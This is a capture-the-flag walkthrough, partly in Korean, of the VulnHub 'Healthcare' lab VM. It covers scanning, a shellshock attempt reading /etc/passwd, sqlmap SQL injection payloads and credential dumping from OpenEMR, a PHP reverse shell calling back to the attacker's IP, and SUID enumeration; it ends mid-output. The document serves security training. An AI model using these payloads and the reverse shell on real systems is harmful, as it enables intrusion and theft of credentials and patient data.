INFO

Name : Healthcare

Entry : 30 / 35

Level : Easy / Intermediate

VulnHub URL : https://www.vulnhub.com/entry/healthcare-1,522/

GOAL

As with most CTFs from VulnHub, the goal is to get the text file which serves as the flag from the /root directory.

SETUP

I’m using both VMWare Workstation and Virtual box(depending on conditions of the image) to host Kali and the MisDirection image, with both VMs running in a NAT network(sometimes Bridged). I used VirtualBox this time.

DESCRIPTON

This machine was developed to train the student to think according to the OSCP methodology. Pay attention to each step, because if you lose something you will not reach the goal: to become root in the system. It is boot2root, tested on VirtualBox (but works on VMWare) and has two flags: user.txt and root.txt.


 

 

​TABLE OF CONTENTS

1. DISCOVERY

2. SCANNING

3. EXPLOITATION

4. POST EXPLOITATION

5. PRIVILEGE ESCALATION


 

1. DISCOVERY

 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.10.1    52:54:00:12:35:00      1      60  Unknown vendor                 
 192.168.10.2    52:54:00:12:35:00      1      60  Unknown vendor                 
 192.168.10.3    08:00:27:46:1d:98      1      60  PCS Systemtechnik GmbH         
 192.168.10.48   08:00:27:f6:fd:1b      1      60  PCS Systemtechnik GmbH      

 

 

 


 

 

2. SCANNING

PORT   STATE SERVICE VERSION
21/tcp open  ftp     ProFTPD 1.3.3d
80/tcp open  http    Apache httpd 2.2.17 ((PCLinuxOS 2011/PREFORK-1pclos2011))
| http-robots.txt: 8 disallowed entries 
| /manual/ /manual-2.2/ /addon-modules/ /doc/ /images/ 
|_/all_our_e-mail_addresses /admin/ /
|_http-server-header: Apache/2.2.17 (PCLinuxOS 2011/PREFORK-1pclos2011)
|_http-title: Coming Soon 2
MAC Address: 08:00:27:F6:FD:1B (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=4/13%OT=21%CT=1%CU=41131%PV=Y%DS=1%DC=D%G=Y%M=080027%T
OS:M=607565B7%P=x86_64-pc-linux-gnu)SEQ(SP=CD%GCD=1%ISR=D1%TI=Z%CI=Z%II=I%T
OS:S=A)OPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O5=
OS:M5B4ST11NW6%O6=M5B4ST11)WIN(W1=3890%W2=3890%W3=3890%W4=3890%W5=3890%W6=3
OS:890)ECN(R=Y%DF=Y%T=40%W=3908%O=M5B4NNSNW6%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=3890%S=O%A=S+%F=AS%O=M5B4ST11
OS:NW6%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40
OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q
OS:=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164
OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

 

+ "robots.txt" contains 8 entries which should be manually viewed.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html
+ Apache/2.2.17 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /cgi-bin/test.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-3092: /cgi-bin/test.cgi: This might be interesting...
+ OSVDB-3233: /icons/README: Apache default file found.


===============================================================
2021/04/13 18:39:13 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 999]
/.htpasswd            (Status: 403) [Size: 999]
/addon-modules        (Status: 403) [Size: 49] 
/cgi-bin/             (Status: 403) [Size: 1013]
/css                  (Status: 301) [Size: 339] [--> http://192.168.10.48/css/]
/favicon.ico          (Status: 200) [Size: 1406]                               
/favicon              (Status: 200) [Size: 1406]                               
/fonts                (Status: 301) [Size: 341] [--> http://192.168.10.48/fonts/]
/gitweb               (Status: 301) [Size: 342] [--> http://192.168.10.48/gitweb/]
/images               (Status: 301) [Size: 342] [--> http://192.168.10.48/images/]
/index                (Status: 200) [Size: 5031]                                  
/js                   (Status: 301) [Size: 338] [--> http://192.168.10.48/js/]    
/phpMyAdmin           (Status: 403) [Size: 59]                                    
/robots               (Status: 200) [Size: 620]                                   
/robots.txt           (Status: 200) [Size: 620]                                   
/server-info          (Status: 403) [Size: 999]                                   
/server-status        (Status: 403) [Size: 999]                                   
/vendor               (Status: 301) [Size: 342] [--> http://192.168.10.48/vendor/]

 

 

 

 

# the next line is a spam bot trap, for grepping the logs. you should _really_ change this to something else...

Disallow: /all_our_e-mail_addresses

# same idea here...

Disallow: /admin/

# but allow htdig to index our doc-tree

#User-agent: htdig

#Disallow:

# disallow stress test

user-agent: stress-agent

Disallow: /

 

 

 

 

 

 

페이지를 새로고침 할 때마다

PORT와 UNIQUE_ID 값이 계속 변한고

파라미터를 입력하면 입력 값이 echo된다.

 

 

shellshock 취약점이 있다고 한다.

┌──(root💀takudaddy)-[/attack]
└─# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'more /etc/passwd'" \http://192.168.10.48/cgi-bin/test.cgi

<b>Date: Tue Apr 13 03:12:57 2021</b><br>
<hr><h1>It worked!</h1>
This script runs under: CGI/1.1<hr></n%ENV: <br>
SCRIPT_NAME = /cgi-bin/test.cgi <br>
SERVER_NAME = (Hidden for security purposes) <br>
SERVER_ADMIN = (Hidden for security purposes) <br>
REQUEST_METHOD = GET <br>
HTTP_ACCEPT = * <br>
SCRIPT_FILENAME = (Hidden for security purposes) <br>
SERVER_SOFTWARE = (Hidden for security purposes) <br>
QUERY_STRING =  <br>
REMOTE_PORT = 35078 <br>
HTTP_USER_AGENT = () { :; }; echo; echo; /bin/bash -c 'more /etc/passwd' <br>
SERVER_SIGNATURE = Apache-AdvancedExtranetServer (Complete info hidden) <br>
SERVER_PORT = (Hidden for security purposes) <br>
REMOTE_ADDR = 192.168.10.10 <br>
SERVER_PROTOCOL = HTTP/1.1 <br>
PATH = (Hidden for security purposes) <br>
REQUEST_URI = /cgi-bin/test.cgi <br>
GATEWAY_INTERFACE = CGI/1.1 <br>
SERVER_ADDR = (Hidden for security purposes) <br>
DOCUMENT_ROOT = (Hidden for security purposes) <br>
HTTP_HOST = 192.168.10.48 <br>
MOD_PERL = (Hidden for security purposes) <br>
UNIQUE_ID = YHVuqX8AAAEAAAiIAloAAAAR <br>

 

하지만 안됨

 

 

 

숨은 디렉터리

 

 

 

 


 

 

3. EXPLOITATION

┌──(root💀takudaddy)-[/study]
└─# sqlmap --url http://192.168.10.48/openemr/interface/login/validateUser.php?u= --dbs --batch
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.5.2#stable}                                           
|_ -| . [.]     | .'| . |                                                          
|___|_  [)]_|_|_|__,|  _|                                                          
      |_|V...       |_|   http://sqlmap.org                                        

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:44:55 /2021-04-13/

Parameter: u (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: u=' OR NOT 5314=5314#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: u=' AND (SELECT 2477 FROM(SELECT COUNT(*),CONCAT(0x7162707671,(SELECT (ELT(2477=2477,1))),0x7162707a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tRsw

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: u=' AND (SELECT 4740 FROM (SELECT(SLEEP(5)))YtDL)-- bjvh
---
[20:45:09] [INFO] the back-end DBMS is MySQL
web server operating system: Linux
web application technology: Apache 2.2.17, PHP 5.3.3
back-end DBMS: MySQL >= 5.0
[20:45:09] [INFO] fetching database names
[20:45:09] [INFO] retrieved: 'information_schema'
[20:45:09] [INFO] retrieved: 'openemr'
[20:45:09] [INFO] retrieved: 'test'
available databases [3]:
[*] information_schema
[*] openemr
[*] test

[20:45:09] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.10.48'               

 

 

┌──(root💀takudaddy)-[/study]
└─# sqlmap --url http://192.168.10.48/openemr/interface/login/validateUser.php?u= --tables --batch  

Database: openemr
[141 tables]
+---------------------------------------+
| array                                 |
| groups                                |
| log                                   |
| version                               |
| addresses                             |
| amc_misc_data                         |
| ar_activity                           |
| ar_session                            |
| audit_details                         |
| audit_master                          |
| automatic_notification                |
| batchcom                              |
| billing                               |
| categories                            |
| categories_seq                        |
| categories_to_documents               |
| chart_tracker                         |
| claims                                |
| clinical_plans                        |
| clinical_plans_rules                  |
| clinical_rules                        |
| code_types                            |
| codes                                 |
| config                                |
| config_seq                            |
| customlists                           |
| documents                             |
| documents_legal_categories            |
| documents_legal_detail                |
| documents_legal_master                |
| drug_inventory                        |
| drug_sales                            |
| drug_templates                        |
| drugs                                 |
| eligibility_response                  |
| eligibility_verification              |
| employer_data                         |
| enc_category_map                      |
| extended_log                          |
| facility                              |
| fee_sheet_options                     |
| form_dictation                        |
| form_encounter                        |
| form_misc_billing_options             |
| form_reviewofs                        |
| form_ros                              |
| form_soap                             |
| form_vitals                           |
| forms                                 |
| gacl_acl                              |
| gacl_acl_sections                     |
| gacl_acl_seq                          |
| gacl_aco                              |
| gacl_aco_map                          |
| gacl_aco_sections                     |
| gacl_aco_sections_seq                 |
| gacl_aco_seq                          |
| gacl_aro                              |
| gacl_aro_groups                       |
| gacl_aro_groups_id_seq                |
| gacl_aro_groups_map                   |
| gacl_aro_map                          |
| gacl_aro_sections                     |
| gacl_aro_sections_seq                 |
| gacl_aro_seq                          |
| gacl_axo                              |
| gacl_axo_groups                       |
| gacl_axo_groups_map                   |
| gacl_axo_map                          |
| gacl_axo_sections                     |
| gacl_groups_aro_map                   |
| gacl_groups_axo_map                   |
| gacl_phpgacl                          |
| geo_country_reference                 |
| geo_zone_reference                    |
| globals                               |
| gprelations                           |
| history_data                          |
| immunizations                         |
| insurance_companies                   |
| insurance_data                        |
| insurance_numbers                     |
| integration_mapping                   |
| issue_encounter                       |
| lang_constants                        |
| lang_custom                           |
| lang_definitions                      |
| lang_languages                        |
| layout_options                        |
| lbf_data                              |
| list_options                          |
| lists                                 |
| lists_touch                           |
| notes                                 |
| notification_log                      |
| notification_settings                 |
| onotes                                |
| sequences                             |
| standardized_tables_track             |
| syndromic_surveillance                |
| template_users                        |
| transactions                          |
| user_settings                         |
| users                                 |
| users_facility                        |
| x12_partners                          |
+---------------------------------------+

 

┌──(root💀takudaddy)-[/study]
└─# sqlmap --url http://192.168.10.48/openemr/interface/login/validateUser.php?u= -D openemr -T users --dump --batch  

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[21:06:03] [INFO] using hash method 'sha1_generic_passwd'
[21:06:03] [INFO] resuming password 'ackbar' for hash '3863efef9ee2bfbc51ecdca359c6302bed1389e8' for user 'admin'
[21:06:03] [INFO] resuming password 'medical' for hash 'ab24aed5a7c4ad45615cd7e0da816eea39e4895d' for user 'medical'

 

admin : ackbar

medical : medical

 

 

 

 

 

Administration > Files > config.php

 

 

 

해당 파일을 우리 리버스 쉘 코드로 바꿔준다.

┌──(root💀takudaddy)-[/study]
└─# cp /usr/share/webshells/php/php-reverse-shell.php .                                                                                                                                  2 ⚙
                                                                                                                                                                                             
┌──(root💀takudaddy)-[/study]
└─# vi php-reverse-shell.php                                                                                                                                                             2 ⚙
                                                                                                                                                                                             
┌──(root💀takudaddy)-[/study]
└─# cat php-reverse-shell.php                                                                                                                                                            2 ⚙
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  The author accepts no liability
// for damage caused by this tool.  If these terms are not acceptable to you, then
// do not use this tool.
//
// In all other respects the GPL version 2 applies:
//
// This program is free software; you can redistribute it and/or modify
// it under the terms of the GNU General Public License version 2 as
// published by the Free Software Foundation.
//
// This program is distributed in the hope that it will be useful,
// but WITHOUT ANY WARRANTY; without even the implied warranty of
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
// GNU General Public License for more details.
//
// You should have received a copy of the GNU General Public License along
// with this program; if not, write to the Free Software Foundation, Inc.,
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
//
// This tool may be used for legal purposes only.  Users take full responsibility
// for any actions performed using this tool.  If these terms are not acceptable to
// you, then do not use this tool.
//
// You are encouraged to send comments, improvements or suggestions to
// me at pentestmonkey@pentestmonkey.net
//
// Description
// -----------
// This script will make an outbound TCP connection to a hardcoded IP and port.
// The recipient will be given a shell running as the current user (apache normally).
//
// Limitations
// -----------
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
// Some compile-time options are needed for daemonisation (like pcntl, posix).  These are rarely available.
//
// Usage
// -----
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.

set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.10.10';  // CHANGE THIS
$port = 7979;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;

 

 

 

다음 리스너 기동 시켜 주고

해당 파일을 다시 한 번 선택하면

 

연결 성공!

 

 


 

 

4. POST EXPLOITATION

sh-4.1$ ls -al
ls -al
total 20
drwxr-xr-x  5 root     root     4096 Jul 29  2020 .
drwxr-xr-x 21 root     root     4096 Apr 13 07:24 ..
drwxr-xr-x 27 almirant almirant 4096 Jul 29  2020 almirant
drwxr-xr-x 31 medical  medical  4096 Nov  5  2011 medical
drwxr-xr-x  3 root     root     4096 Nov  4  2011 mysql
sh-4.1$ cd almirant
cd almirant
sh-4.1$ ls -al
ls -al
total 164
drwxr-xr-x 27 almirant almirant 4096 Jul 29  2020 .
drwxr-xr-x  5 root     root     4096 Jul 29  2020 ..
-rw-------  1 almirant almirant 7524 Jul 29  2020 .ICEauthority
-rw-------  1 almirant almirant   54 Jul 29  2020 .Xauthority
drwx------  3 almirant almirant 4096 Jul 29  2020 .adobe
-rw-------  1 almirant almirant  197 Jul 29  2020 .bash_history
-rw-r--r--  1 almirant almirant  193 Sep 24  2011 .bash_profile
-rw-rw-r--  1 almirant almirant  145 Sep  6  2011 .bashrc
drwxr-xr-x  2 almirant almirant 4096 Jul 29  2020 .cache
drwx------  8 almirant almirant 4096 Jul 22  2011 .config
drwx------  3 almirant almirant 4096 Jul 29  2020 .dbus
-rwxrwxr-x  1 almirant almirant   14 Jul 19  2011 .desktop
-rw-------  1 almirant almirant   28 Jul 29  2020 .dmrc
-rw-------  1 almirant almirant   16 Jul 29  2020 .esd_auth
drwx------  4 almirant almirant 4096 Jul 29  2020 .gconf
drwx------  2 almirant almirant 4096 Jul 29  2020 .gconfd
drwx------  8 almirant almirant 4096 Jul 29  2020 .gnome2
drwx------  2 almirant almirant 4096 Jul 19  2011 .gnome2_private
drwx------  3 almirant almirant 4096 Jul 29  2020 .gnupg
-rw-rw-r--  1 almirant almirant  137 Jul 20  2011 .gtk-bookmarks
drwx------  2 almirant almirant 4096 Jul 29  2020 .gvfs
drwxr-xr-x  3 almirant almirant 4096 Jul 19  2011 .local
-rw-r--r--  1 almirant almirant    0 Oct 22  2010 .mdk-menu-migrated
-rw-rw-r--  1 almirant almirant    0 Jul 29  2020 .menu-updates.stamp
drwx------  4 almirant almirant 4096 Jul 29  2020 .mozilla
drwxr-xr-x  2 almirant almirant 4096 Oct 22  2010 .nautilus
drwx------  2 almirant almirant 4096 Jul 29  2020 .pulse
-rw-------  1 almirant almirant  256 Jul 29  2020 .pulse-cookie
drwxrwxr-x  2 almirant almirant 4096 Jul 19  2011 .themes
drwx------  3 almirant almirant 4096 Jul 19  2011 .thumbnails
-rw-r--r--  1 almirant almirant 1897 Jul  6  2011 .xbindkeysrc
-rw-------  1 almirant almirant 1613 Jul 29  2020 .xsession-errors
drwxr--r--  2 almirant almirant 4096 Jul 19  2011 Desktop
drwx------  2 almirant almirant 4096 Jan 19  2010 Documents
drwx------  2 almirant almirant 4096 Jul 19  2011 Downloads
drwx------  2 almirant almirant 4096 Jan 19  2010 Movies
drwx------  2 almirant almirant 4096 Jan 19  2010 Music
drwx------  2 almirant almirant 4096 Jan 19  2010 Pictures
drwxr-xr-x  2 almirant almirant 4096 Jul 19  2011 Templates
drwxr-xr-x  2 almirant almirant 4096 Jul 19  2011 Videos
drwx------  9 almirant almirant 4096 Jul 29  2020 tmp
-rwxrwxr-x  1 root     root       33 Jul 29  2020 user.txt
sh-4.1$ ls
ls
Desktop
Documents
Downloads
Movies
Music
Pictures
Templates
Videos
tmp
user.txt
sh-4.1$ cat user.txt
cat user.txt
d41d8cd98f00b204e9800998ecf8427e
sh-4.1$ 

 

 

 

sh-4.1$ find / -perm -u=s -type f -exec ls -l {} \; 2>/dev/null
find / -perm -u=s -type f -exec ls -l {} \; 2>/dev/null
-rwsr-xr-x 1 root root 9564 Sep  3  2011 /usr/libexec/pt_chown
-rws--x--x 1 root root 238352 Sep  8  2011 /usr/lib/ssh/ssh-keysign
-rwsr-xr-x 1 root polkituser 5748 Apr  5  2010 /usr/lib/polkit-resolve-exe-helper
-rwsr-xr-x 1 root root 9108 Aug 29  2011 /usr/lib/polkit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 9940 Nov  2  2011 /usr/lib/chromium-browser/chrome-sandbox
-rwsr-xr-- 1 root polkituser 7580 Apr  5  2010 /usr/lib/polkit-grant-helper-pam
-rwsr-xr-x 1 polkituser root 16356 Apr  5  2010 /usr/lib/polkit-set-default-helper
-rwsr-xr-x 1 root root 10757 Jun 11  2011 /usr/sbin/fileshareset
-rwsr-xr-x 1 root root 12036 Nov 28  2010 /usr/sbin/traceroute6
-rwsr-xr-x 1 root root 10713 Aug  2  2011 /usr/sbin/usernetctl
-rwsr-xr-x 1 root root 33324 Nov  9  2009 /usr/sbin/userhelper
-rwsr-sr-x 1 root root 39020 Jun 26  2011 /usr/bin/crontab
-rwsr-sr-x 1 daemon daemon 41036 Jan 19  2010 /usr/bin/at
-rwsr-xr-x 1 root root 28916 Dec 28  2010 /usr/bin/pumount
-rwsr-sr-x 1 daemon daemon 137 Jan 19  2010 /usr/bin/batch
-rwsr-xr-x 1 root root 15848 Jan  9  2010 /usr/bin/expiry
-rws--x--x 1 root root 28752 Jan  9  2010 /usr/bin/newgrp
-rwsr-xr-x 1 root root 16920 Aug 29  2011 /usr/bin/pkexec
-rwsr-xr-x 1 root root 122188 Nov 28  2010 /usr/bin/wvdial
-rwsr-xr-x 1 root root 39488 Dec 28  2010 /usr/bin/pmount
-rws--x--x 1 root root 63752 Jan 23  2010 /usr/bin/sperl5.10.1
-rwsr-xr-x 1 root root 370648 Jan 18  2011 /usr/bin/gpgsm
-rwsr-xr-x 1 root root 56100 Jan  9  2010 /usr/bin/gpasswd
-rws--x--x 1 root root 12400 Nov 16  2010 /usr/bin/chfn
-r-sr-xr-x 1 root root 31144 Nov 16  2010 /usr/bin/su
-r-s--x--x 1 root shadow 20512 Jan 30  2010 /usr/bin/passwd
-rwsr-xr-x 1 root root 956252 Oct 18  2010 /usr/bin/gpg
-rwsr-sr-x 1 root root 5813 Jul 29  2020 /usr/bin/healthcheck
-rwsr-xr-x 1 root root 5852 Sep 22  2011 /usr/bin/Xwrapper
-rwsr-xr-x 1 root root 35128 Nov 28  2010 /usr/bin/ping6
-rws--x--x 1 root root 11664 Nov 16  2010 /usr/bin/chsh
-rwsr-x--- 1 root messagebus 314400 Sep 29  2011 /lib/dbus-1/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 11114 Jul  6  2011 /sbin/pam_timestamp_check
-rwsr-xr-x 1 root root 34848 Nov 28  2010 /bin/ping
-rwsr-xr-x 1 root root 26360 Oct 18  2011 /bin/fusermount
-rwsr-xr-x 1 root root 31144 Nov 16  2010 /bin/su
-rwsr-xr-x 1 root root 80748 Nov 16  2010 /bin/mount
-rwsr-xr-x 1 root root 31180 Nov 16  2010 /bin/umount

 

 

 

 

sh-4.1$ su medical
su medical
Password: medical
id
uid=500(medical) gid=500(medical) groups=500(medical),7(lp),19(floppy),22(cdrom),80(cdwriter),81(audio),82(video),83(dialout),100(users),490(polkituser),501(fuse)

python -c 'import pty;pty.spawn("/bin/bash")'
[medical@localhost home]$ 

[medical@localhost home]$ ls -al
ls -al
total 20
drwxr-xr-x  5 root     root     4096 Jul 29  2020 ./
drwxr-xr-x 21 root     root     4096 Apr 13 07:24 ../
drwxr-xr-x 27 almirant almirant 4096 Jul 29  2020 almirant/
drwxr-xr-x 31 medical  medical  4096 Apr 13 07:49 medical/
drwxr-xr-x  3 root     root     4096 Nov  4  2011 mysql/
[medical@localhost home]$ cd medical
cd medical
[medical@localhost ~]$ ls -al
ls -al
total 172
drwxr-xr-x 31 medical medical 4096 Apr 13 07:49 ./
drwxr-xr-x  5 root    root    4096 Jul 29  2020 ../
-rw-------  1 medical medical 6004 Nov  5  2011 .ICEauthority
-rw-------  1 medical medical  120 Nov  5  2011 .Xauthority
drwx------  3 medical medical 4096 Nov  4  2011 .adobe/
-rw-------  1 medical medical   19 Apr 13 07:50 .bash_history
-rw-r--r--  1 medical medical  193 Sep 24  2011 .bash_profile
-rw-rw-r--  1 medical medical  145 Sep  6  2011 .bashrc
drwxr-xr-x  3 medical medical 4096 Nov  5  2011 .cache/
drwx------ 11 medical medical 4096 Nov  5  2011 .config/
drwx------  3 medical medical 4096 Oct 27  2011 .dbus/
-rwxrwxr-x  1 root    root      14 Nov  4  2011 .desktop*
-rw-------  1 medical medical   28 Nov  5  2011 .dmrc
-rw-------  1 medical medical   16 Oct 27  2011 .esd_auth
drwxr-xr-x  2 medical medical 4096 Nov  4  2011 .fontconfig/
drwx------  4 medical medical 4096 Nov  5  2011 .gconf/
drwx------  2 medical medical 4096 Nov  5  2011 .gconfd/
-rw-r-----  1 medical medical    0 Nov  5  2011 .gksu.lock
drwx------  9 medical medical 4096 Nov  4  2011 .gnome2/
drwx------  2 medical medical 4096 Jul 19  2011 .gnome2_private/
drwx------  3 medical medical 4096 Oct 27  2011 .gnupg/
-rw-rw-r--  1 medical medical  326 Nov  5  2011 .gtk-bookmarks
drwxrwxr-x  2 medical medical 4096 Oct 27  2011 .icons/
drwxr-xr-x  3 medical medical 4096 Jul 19  2011 .local/
drwx------  3 medical medical 4096 Oct 27  2011 .macromedia/
-rw-r--r--  1 medical medical    0 Oct 22  2010 .mdk-menu-migrated
-rw-rw-r--  1 medical medical    0 Nov  5  2011 .menu-updates.stamp
drwx------  4 medical medical 4096 Oct 27  2011 .mozilla/
drwx------  3 medical medical 4096 Oct 27  2011 .mysqlgui/
drwxr-xr-x  2 medical medical 4096 Oct 22  2010 .nautilus/
drwx------  3 medical medical 4096 Nov  5  2011 .pki/
drwx------  2 medical medical 4096 Oct 27  2011 .pulse/
-rw-------  1 medical medical  256 Oct 27  2011 .pulse-cookie
drwxrwxr-x  2 medical medical 4096 Jul 19  2011 .themes/
drwx------  3 medical medical 4096 Jul 19  2011 .thumbnails/
-rw-r--r--  1 medical medical 1897 Jul  6  2011 .xbindkeysrc
drwxr--r--  2 medical medical 4096 Nov  5  2011 Desktop/
drwx------  2 medical medical 4096 Nov  4  2011 Documents/
drwx------  2 medical medical 4096 Oct 27  2011 Downloads/
drwx------  2 medical medical 4096 Jan 19  2010 Movies/
drwx------  2 medical medical 4096 Jan 19  2010 Music/
drwx------  2 medical medical 4096 Oct 27  2011 Pictures/
drwxr-xr-x  2 medical medical 4096 Jul 19  2011 Templates/
drwxr-xr-x  2 medical medical 4096 Jul 19  2011 Videos/
drwx------  9 medical medical 4096 Nov  5  2011 tmp/
[medical@localhost ~]$ cat .bash_history
cat .bash_history
ps
exit
ps
id
exit

[medical@localhost ~]$ cd Documents
cd Documents
[medical@localhost Documents]$ ls
ls
OpenEMR Passwords.pdf*  Passwords.txt
[medical@localhost Documents]$ cat Passwords.txt
cat Passwords.txt
PCLINUXOS MEDICAL
root-root
medical-medical


OPENEMR
admin-admin
medical-medical


 

 

[medical@localhost ~]$ find / -perm -4000 -type f -exec ls -l {} \; 2>/dev/null
< / -perm -4000 -type f -exec ls -l {} \; 2>/dev/nul                         
-rwsr-xr-x 1 root root 9564 Sep  3  2011 /usr/libexec/pt_chown

-rws--x--x 1 root root 238352 Sep  8  2011 /usr/lib/ssh/ssh-keysign
-rwsr-xr-x 1 root polkituser 5748 Apr  5  2010 /usr/lib/polkit-resolve-exe-helper
-rwsr-xr-x 1 root root 9108 Aug 29  2011 /usr/lib/polkit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 9940 Nov  2  2011 /usr/lib/chromium-browser/chrome-sandbox
-rwsr-xr-- 1 root polkituser 7580 Apr  5  2010 /usr/lib/polkit-grant-helper-pam
-rwsr-xr-x 1 polkituser root 16356 Apr  5  2010 /usr/lib/polkit-set-default-helper
-rwsr-xr-x 1 root root 10757 Jun 11  2011 /usr/sbin/fileshareset
-rwsr-xr-x 1 root root 12036 Nov 28  2010 /usr/sbin/traceroute6
-rwsr-xr-x 1 root root 10713 Aug  2  2011 /usr/sbin/usernetctl
-rwsr-xr-x 1 root root 33324 Nov  9  2009 /usr/sbin/userhelper
-rwsr-sr-x 1 root root 39020 Jun 26  2011 /usr/bin/crontab
-rwsr-sr-x 1 daemon daemon 41036 Jan 19  2010 /usr/bin/at
-rwsr-xr-x 1 root root 28916 Dec 28  2010 /usr/bin/pumount
-rwsr-sr-x 1 daemon daemon 137 Jan 19  2010 /usr/bin/batch
-rwsr-xr-x 1 root root 15848 Jan  9  2010 /usr/bin/expiry
-rws--x--x 1 root root 28752 Jan  9  2010 /usr/bin/newgrp
-rwsr-xr-x 1 root root 16920 Aug 29  2011 /usr/bin/pkexec
-rwsr-xr-x 1 root root 122188 Nov 28  2010 /usr/bin/wvdial
-rwsr-xr-x 1 root root 39488 Dec 28  2010 /usr/bin/pmount
-rws--x--x 1 root root 63752 Jan 23  2010 /usr/bin/sperl5.10.1
-rwsr-xr-x 1 root root 370648 Jan 18  2011 /usr/bin/gpgsm
-rwsr-xr-x 1 root root 56100 Jan  9  2010 /usr/bin/gpasswd
-rws--x--x 1 root root 12400 Nov 16  2010 /usr/bin/chfn
-r-sr-xr-x 1 root root 31144 Nov 16  2010 /usr/bin/su
-r-s--x--x 1 root shadow 20512 Jan 30  2010 /usr/bin/passwd
-rwsr-xr-x 1 root root 956252 Oct 18  2010 /usr/bin/gpg
-rwsr-sr-x 1 root root 5813 Jul 29  2020 /usr/bin/healthcheck
-rwsr-xr-x 1 root root 5852 Sep 22  2011 /usr/bin/Xwrapper
-rwsr-xr-x 1 root root 35128 Nov 28  2010 /usr/bin/ping6
-rws--x--x 1 root root 11664 Nov 16  2010 /usr/bin/chsh
-rwsr-x--- 1 root messagebus 314400 Sep 29  2011 /lib/dbus-1/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 11114 Jul  6  2011 /sbin/pam_timestamp_check
-rwsr-xr-x 1 root root 34848 Nov 28  2010 /bin/ping
-rwsr-xr-x 1 root root 26360 Oct 18  2011 /bin/fusermount
-rwsr-xr-x 1 root root 31144 Nov 16  2010 /bin/su
-rwsr-xr-x 1 root root 80748 Nov 16  2010 /bin/mount
-rwsr-xr-x 1 root root 31180 Nov 16  2010 /bin/umount

health check

 

 

 

[medical@localhost ~]$ healthcheck    
healthcheck
TERM environment variable not set.
System Health Check

Scanning System
id
id
eth1      Link encap:Ethernet  HWaddr 08:00:27:F6:FD:1B  
          inet addr:192.168.10.48  Bcast:192.168.10.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fef6:fd1b/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1435 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1738 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:159792 (156.0 KiB)  TX bytes:2249923 (2.1 MiB)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)


Disk /dev/sda: 10.7 GB, 10737418240 bytes
255 heads, 63 sectors/track, 1305 cylinders, total 20971520 sectors
